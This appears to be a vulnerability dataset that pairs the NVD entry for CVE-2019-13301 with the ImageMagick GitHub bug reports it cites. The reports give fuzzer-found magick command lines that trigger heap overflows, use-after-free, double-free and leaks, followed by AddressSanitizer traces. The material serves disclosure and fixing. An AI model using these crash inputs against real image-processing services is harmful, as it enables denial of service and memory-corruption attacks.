#14 0x7f7983059b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#15 0x425819 in _start (install/bin/magick+0x425819)
0x629000018800 is located 0 bytes to the right of 17920-byte region [0x629000014200,0x629000018800)
allocated by thread T0 here:
#0 0x4efb47 in __interceptor_malloc (install/bin/magick+0x4efb47)
#1 0x5824e7 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x58254f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x61cfee in AcquirePixelThreadSet MagickCore/statistic.c:175:33
#4 0x61ba43 in EvaluateImages MagickCore/statistic.c:493:19
#5 0x13fcdb9 in CLIListOperatorImages MagickWand/operation.c:4081:22
#6 0x1406ec5 in CLIOption MagickWand/operation.c:5276:14
#7 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#8 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#9 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#10 0x531745 in MagickMain utilities/magick.c:149:10
#11 0x531091 in main utilities/magick.c:180:10
#12 0x7f7983059b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/statistic.c:654:41 in .omp_outlined._debug__.10
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information: CC=clang-7 CXX=clang++-7
<!-- Thanks for reporting the issue to ImageMagick! -->
| heap-buffer-overflow in MagickCore/statistic.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1586/comments | 3 | 2019-06-10T15:57:48Z | 2019-07-08T01:49:56Z | https://github.com/ImageMagick/ImageMagick/issues/1586 | 454,242,285 | 1,586 |
CVE-2019-13301 | 2019-07-05T01:15:10.297 | ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1585"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1589"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1585 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
There is a heap buffer overflow/heap-use-after-free vulnerability in MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72 with the same input.
And also memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10
this still exists [#1558](https://github.com/ImageMagick/ImageMagick/issues/1558)
It sometimes doesn't occur so needs to be executed for several times.
I found that this bug was not reproduced but it is reproduced with certain arguments. [#1500](https://github.com/ImageMagick/ImageMagick/issues/1500)
<!-- A description of the bug or feature -->
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick "-black-point-compensation" "-weight" "63" "(" "magick:logo" "-normalize" "-resize" "892%-38-49" ")" "(" "magick:wizard" "-preview" "Spiff" "-solarize" "35%" "-cycle" "813" ")" "(" "magick:granite" "-preview" "Blur" "-draw" ""rotate" "205"" "-colors" "109" ")" "-crop" "333x497" "-print" ""
`
This is about the heap-buffer-overflow.
```
=================================================================
==19621==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fc8b5310d28 at pc 0x000000f00dff bp 0x7ffc7c6a9a50 sp 0x7ffc7c6a9a48
READ of size 4 at 0x7fc8b5310d28 thread T0
#0 0xf00dfe in .omp_outlined._debug__.72 MagickCore/resize.c:2823:28
#1 0xf019b6 in .omp_outlined..73 MagickCore/resize.c:2706:3
#2 0x7fc8c2077452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7fc8c20311b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#4 0x7fc8c20322b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5)
#5 0x7fc8c20257be in __kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be)
#6 0xef317f in VerticalFilter MagickCore/resize.c:2703:11
#7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14
#8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21
#9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15
#10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16
#13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x531745 in MagickMain utilities/magick.c:149:10
#17 0x531091 in main utilities/magick.c:180:10
#18 0x7fc8c1a13b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#19 0x425819 in _start (/usr/local/bin/magick+0x425819)
0x7fc8b5310d28 is located 1832 bytes to the right of 1175040-byte region [0x7fc8b51f1800,0x7fc8b5310600)
allocated by thread T0 here:
#0 0x4f09b0 in __interceptor_posix_memalign (/usr/local/bin/magick+0x4f09b0)
#1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0xb11bac in OpenPixelCache MagickCore/cache.c:3728:46
#3 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28
#5 0x53f46e in SetImageStorageClass MagickCore/image.c:2627:10
#6 0xef2791 in VerticalFilter MagickCore/resize.c:2681:7
#7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14
#8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21
#9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15
#10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16
#13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x531745 in MagickMain utilities/magick.c:149:10
#17 0x531091 in main utilities/magick.c:180:10
#18 0x7fc8c1a13b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72
```
And this is about heap-use-after-free.
```
=================================================================
==24235==ERROR: AddressSanitizer: heap-use-after-free on address 0x7f2fd1712c88 at pc 0x000000f00dff bp 0x7ffef1b2acd0 sp 0x7ffef1b2acc8
READ of size 4 at 0x7f2fd1712c88 thread T0
#0 0xf00dfe in .omp_outlined._debug__.72 MagickCore/resize.c:2823:28
#1 0xf019b6 in .omp_outlined..73 MagickCore/resize.c:2706:3
#2 0x7f2fde527452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7f2fde4e11b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#4 0x7f2fde4e22b5 in __kmp_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x372b5)
#5 0x7f2fde4d57be in __kmpc_fork_call (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x2a7be)
#6 0xef317f in VerticalFilter MagickCore/resize.c:2703:11
#7 0xef0442 in ResizeImage MagickCore/resize.c:2961:14
#8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21
#9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15
#10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16
#13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x531745 in MagickMain utilities/magick.c:149:10
#17 0x531091 in main utilities/magick.c:180:10
#18 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#19 0x425819 in _start (/usr/local/bin/magick+0x425819)
0x7f2fd1712c88 is located 1160 bytes inside of 1566720-byte region [0x7f2fd1712800,0x7f2fd1891000)
freed by thread T0 here:
#0 0x4ef768 in __interceptor_free (/usr/local/bin/magick+0x4ef768)
#1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3
#2 0xafde01 in RelinquishPixelCachePixels MagickCore/cache.c:972:40
#3 0xb12119 in OpenPixelCache MagickCore/cache.c:3757:19
#4 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18
#5 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28
#6 0x53f46e in SetImageStorageClass MagickCore/image.c:2627:10
#7 0xef2791 in VerticalFilter MagickCore/resize.c:2681:7
#8 0xef0442 in ResizeImage MagickCore/resize.c:2961:14
#9 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21
#10 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15
#11 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#12 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#13 0x1406e7c in CLIOption MagickWand/operation.c:5270:16
#14 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#15 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#16 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#17 0x531745 in MagickMain utilities/magick.c:149:10
#18 0x531091 in main utilities/magick.c:180:10
#19 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
previously allocated by thread T0 here:
#0 0x4f09b0 in __interceptor_posix_memalign (/usr/local/bin/magick+0x4f09b0)
#1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0xb11bac in OpenPixelCache MagickCore/cache.c:3728:46
#3 0xb188c5 in GetImagePixelCache MagickCore/cache.c:1754:18
#4 0xb1f66b in SyncImagePixelCache MagickCore/cache.c:5494:28
#5 0x54833f in SetImageExtent MagickCore/image.c:2668:10
#6 0x53f1c3 in CloneImage MagickCore/image.c:911:7
#7 0xef0272 in ResizeImage MagickCore/resize.c:2940:18
#8 0xefb6bd in ThumbnailImage MagickCore/resize.c:3703:21
#9 0xd0cdfd in PreviewImage MagickCore/effect.c:2337:15
#10 0x13f0c33 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#11 0x13e0af5 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x1406e7c in CLIOption MagickWand/operation.c:5270:16
#13 0x128a9db in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x128bcf2 in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x128e457 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x531745 in MagickMain utilities/magick.c:149:10
#17 0x531091 in main utilities/magick.c:180:10
#18 0x7f2fddec3b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/resize.c:2823:28 in .omp_outlined._debug__.72
```
About memory leaks in AcquireMagickMemory of MagickCore/memory.c:478:10
```
==7040==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 73928 byte(s) in 18 object(s) allocated from:
#0 0x4e53b7 in __interceptor_malloc (install/bin/magick+0x4e53b7)
#1 0x7f26dee6f8b6 in AcquireMagickMemory MagickCore/memory.c:478:10
#2 0x7f26dee6f91f in AcquireQuantumMemory MagickCore/memory.c:551:10
#3 0x7f26df03be77 in AcquireString MagickCore/string.c:142:24
#4 0x7f26df03ca21 in CloneString MagickCore/string.c:300:20
#5 0x7f26dec7b28a in CloneDrawInfo MagickCore/draw.c:310:12
#6 0x7f26dea7108b in AnnotateImage MagickCore/annotate.c:267:12
#7 0x7f26dee7e6ba in MontageImageList MagickCore/montage.c:842:22
#8 0x7f26dee78821 in MontageImages MagickCore/montage.c:316:17
#9 0x7f26decf1ba4 in PreviewImage MagickCore/effect.c:2747:17
#10 0x7f26de4f3581 in CLISimpleOperatorImage MagickWand/operation.c:2964:21
#11 0x7f26de4e39b8 in CLISimpleOperatorImages MagickWand/operation.c:3685:12
#12 0x7f26de509045 in CLIOption MagickWand/operation.c:5270:16
#13 0x7f26de348749 in ProcessCommandOptions MagickWand/magick-cli.c:477:7
#14 0x7f26de3499ba in MagickImageCommand MagickWand/magick-cli.c:796:5
#15 0x7f26de3940d2 in MagickCommandGenesis MagickWand/mogrify.c:185:14
#16 0x526fb5 in MagickMain utilities/magick.c:149:10
#17 0x526901 in main utilities/magick.c:180:10
#18 0x7f26d8925b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: 73928 byte(s) leaked in 18 allocation(s).
```
### System Configuration
<!-- Tell us about the environment where you are experiencing the bug -->
- ImageMagick version:
Version: ImageMagick 7.0.8-50 Q16 x86_64 2019-06-10
- Environment (Operating system, version and so on):
Description: Ubuntu 18.04.1 LTS
Release: 18.04
Codename: bionic
- Additional information: CC=clang-7 CXX=clang++-7
(heap-buffer-overflow/heap-use-after-free are triggered when compiled with option '--disable-shared')
(memory leak is triggered when compiled without option '--disable-shared')
<!-- Thanks for reporting the issue to ImageMagick! -->
| memory leaks in AcquireMagickMemory of MagickCore/memory.c | https://api.github.com/repos/ImageMagick/ImageMagick/issues/1585/comments | 5 | 2019-06-10T14:34:22Z | 2019-10-05T02:53:40Z | https://github.com/ImageMagick/ImageMagick/issues/1585 | 454,202,041 | 1,585 |
CVE-2019-13301 | 2019-07-05T01:15:10.297 | ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "[email protected]",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html"
},
{
"source": "[email protected]",
"tags": [
"Patch"
],
"url": "https://github.com/ImageMagick/ImageMagick/commit/f595a1985233c399a05c0c37cc41de16a90dd025"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1585"
},
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/ImageMagick/ImageMagick/issues/1589"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://usn.ubuntu.com/4192-1/"
},
{
"source": "[email protected]",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2020/dsa-4712"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-50:q16:*:*:*:*:*:*",
"matchCriteriaId": "25CCEA99-8329-46C6-9625-4FE15F24CF69",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*",
"matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*",
"matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*",
"matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/ImageMagick/ImageMagick/issues/1589 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"ImageMagick",
"ImageMagick"
] | ### Prerequisites
- [x] I have written a descriptive issue title
- [x] I have verified that I am using the latest version of ImageMagick
- [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported
### Description
<!-- A description of the bug or feature -->
There are a heap-use-after-free(sometimes heap-buffer-overflow) vulnerability in MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69 and a double-free bug in RelinquishAlignedMemory MagickCore/memory.c:1037:3 with the same input.
For each run, different bugs are triggered so please run the command for several times.
related: [#1344](https://github.com/ImageMagick/ImageMagick/issues/1344)
### Steps to Reproduce
<!-- List of steps, sample code, failing test or link to a project that reproduces the behavior.
Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues -->
run cmd:
`magick -seed 0 -black-point-compensation -units Undefined "(" magick:granite -opaque "rgb(224,28,104)" -gaussian-blur 2 -strip ")" "(" magick:rose -black-threshold 15 -preview Despeckle ")" -density 3x83 -stretch ExtraCondensed -copy "937x560ls" "-52-59" ""`
This is about Heap-use-after-free in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28
```
==26215==ERROR: AddressSanitizer: heap-use-after-free on address 0x62800000036c at pc 0x000000efe4dc bp 0x7f637b304e90 sp 0x7f637b304e88
READ of size 4 at 0x62800000036c thread T1
#0 0xefe4db in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28
#1 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#2 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
#4 0x7f6383dcbb20 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x34b20)
#5 0x7f6383e0b417 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x74417)
#6 0x7f63864476da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
#7 0x7f63838af88e in clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
0x62800000036c is located 620 bytes inside of 14400-byte region [0x628000000100,0x628000003940)
freed by thread T2 here:
#0 0x4ef768 in __interceptor_free (install/bin/magick+0x4ef768)
#1 0x583e5c in RelinquishAlignedMemory MagickCore/memory.c:1037:3
#2 0xafe7c6 in RelinquishCacheNexusPixels MagickCore/cache.c:1089:12
#3 0xb0d5db in SetPixelCacheNexusPixels MagickCore/cache.c:5080:9
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7
#7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#8 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
previously allocated by thread T1 here:
#0 0x4f09b0 in __interceptor_posix_memalign (install/bin/magick+0x4f09b0)
#1 0x5822fa in AcquireAlignedMemory MagickCore/memory.c:265:7
#2 0xb24539 in AcquireCacheNexusPixels MagickCore/cache.c:4968:37
#3 0xb0d587 in SetPixelCacheNexusPixels MagickCore/cache.c:5076:12
#4 0xb04b7c in GetVirtualPixelCacheNexus MagickCore/cache.c:2751:10
#5 0xb28621 in GetCacheViewVirtualPixels MagickCore/cache-view.c:664:10
#6 0xefd9e9 in .omp_outlined._debug__.69 MagickCore/resize.c:2542:7
#7 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#8 0x7f6383e13452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#9 0x7f6383dcd1b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
Thread T1 created by T0 here:
#0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0)
#1 0x7f6383e09110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110)
Thread T2 created by T0 here:
#0 0x43fcd0 in pthread_create (install/bin/magick+0x43fcd0)
#1 0x7f6383e09110 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x72110)
SUMMARY: AddressSanitizer: heap-use-after-free MagickCore/resize.c:2604:28 in .omp_outlined._debug__.69
```
This is about the heap-buffer-overflow in .omp_outlined._debug__.69 MagickCore/resize.c:2604
```
==26841==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61d00001d670 at pc 0x000000efe4dc bp 0x7f78c5104e90 sp 0x7f78c5104e88
READ of size 4 at 0x61d00001d670 thread T1
#0 0xefe4db in .omp_outlined._debug__.69 MagickCore/resize.c:2604:28
#1 0xeff106 in .omp_outlined..70 MagickCore/resize.c:2488:3
#2 0x7f78cdc28452 in __kmp_invoke_microtask (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x7c452)
#3 0x7f78cdbe21b6 (/usr/lib/x86_64-linux-gnu/libomp.so.5+0x361b6)
